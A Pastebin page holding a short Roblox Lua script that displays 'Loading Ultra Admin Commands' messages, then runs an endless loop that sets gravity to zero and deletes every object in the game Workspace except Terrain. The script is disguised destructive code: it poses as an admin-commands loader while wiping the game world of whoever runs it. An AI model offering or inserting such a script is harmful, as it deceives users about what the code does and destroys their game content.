Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- script.Name = ("nom8")
- script.Parent = game.StarterPlayer
- game.Players.Name = ("codedmeme")
- p = Instance.new("Message")
- p.Parent = game.Workspace
- p.Text = ("Loading Ultra Admin Commands")
- wait(5)
- p.Text = ("Still Loading")
- wait(5)
- p.Text = ("LOADED")
- wait(2)
- p:Remove()
- while true do
- wait(10)
- game.Workspace.Gravity = (0)
- game.StarterPlayer.LoadCharacterAppearance = false
- for i,v in pairs(game.Workspace:GetChildren()) do
- if v.Name ~= ("Terrain") then
- v:Remove()
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement